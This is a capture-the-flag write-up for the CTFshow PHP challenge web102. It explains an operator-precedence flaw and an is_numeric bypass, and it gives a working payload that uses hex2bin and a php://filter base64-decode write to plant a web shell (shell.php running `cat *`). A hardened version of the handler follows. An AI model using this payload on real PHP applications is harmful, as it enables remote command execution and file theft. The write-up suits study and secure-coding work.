CTFshow - WEB Basics - PHP Features: web102
Challenge code
<?php
/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-23 20:59:43
*/
highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){
    $s = substr($v2,2);
    $str = call_user_func($v1,$s);
    echo $str;
    file_put_contents($v3,$str);
}
else{
    die('hacker');
}
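Because of operator precedence (= binds tighter than and), the assignment is evaluated as ($v4 = is_numeric($v2)) and is_numeric($v3). When is_numeric($v2) is true, $v4 is true, and the check on $v3 has no effect on it.
$v2 can take the form digits-e-digits (scientific notation), which is_numeric() accepts. The hex string below contains only digits and a single e, so it passes.
The hex string 115044383959474e6864434171594473, converted to a string and then base64-decoded, gives <?=`cat *`;
Writing the file: file_put_contents('php://filter/write=convert.base64-decode/resource=shell.php', hex2bin('115044383959474e6864434171594473'))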
Payload:
v1=hex2bin
?v2=00115044383959474e6864434171594473&v3=php://filter/write=convert.base64-decode/resource=shell.php
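The precedence bug in isolation, followed by the same handler with its three weaknesses closed (both operands checked, callback allowlisted, destination path built server-side). This is an added example, not the challenge's code; ALLOWED_FUNCS, OUT_DIR, handle() and all sample inputs are assumptions made for illustration.

```php
<?php
// Added example, not the challenge's code. ALLOWED_FUNCS, OUT_DIR and handle()
// are hypothetical names; all inputs below are constructed.

// 1) The precedence bug in isolation: `=` binds tighter than `and`.
$a = '12e3';
$b = 'php://not-numeric';
$loose  = is_numeric($a) and is_numeric($b);  // parsed as ($loose = is_numeric($a)) and ...
$strict = is_numeric($a) && is_numeric($b);   // `&&` binds tighter than `=`
var_dump($loose, $strict);

// 2) The same handler with the three weaknesses closed.
const ALLOWED_FUNCS = ['strrev', 'strtoupper'];  // assumed callback allowlist
const OUT_DIR = '/tmp/web102-out';               // assumed fixed output directory

function handle(string $v1, string $v2, string $v3): string
{
    // ctype_digit() accepts ASCII digits only: no "e", sign, dot or whitespace,
    // so neither value can carry hex letters or a stream-wrapper scheme.
    if (!(ctype_digit($v2) && ctype_digit($v3))) {
        return 'rejected: v2 and v3 must be digits only';
    }
    // A request value never names the function to call unless it is allowlisted.
    if (!in_array($v1, ALLOWED_FUNCS, true)) {
        return 'rejected: callback not allowed';
    }
    $str = (string) call_user_func($v1, (string) substr($v2, 2));

    // The path is built server-side; $v3 only contributes a numeric id.
    if (!is_dir(OUT_DIR) && !mkdir(OUT_DIR, 0700, true)) {
        return 'error: cannot create output directory';
    }
    $dest = OUT_DIR . '/' . $v3 . '.txt';
    file_put_contents($dest, $str, LOCK_EX);
    return "wrote $dest";
}

// Constructed requests: two with the shape used in the write-up, one benign.
$requests = [
    ['hex2bin', '0012e34', '7'],
    ['strrev',  '001234',  'php://filter/resource=out.php'],
    ['strrev',  '001234',  '7'],
];
foreach ($requests as [$v1, $v2, $v3]) {
    echo handle($v1, $v2, $v3), PHP_EOL;
}
```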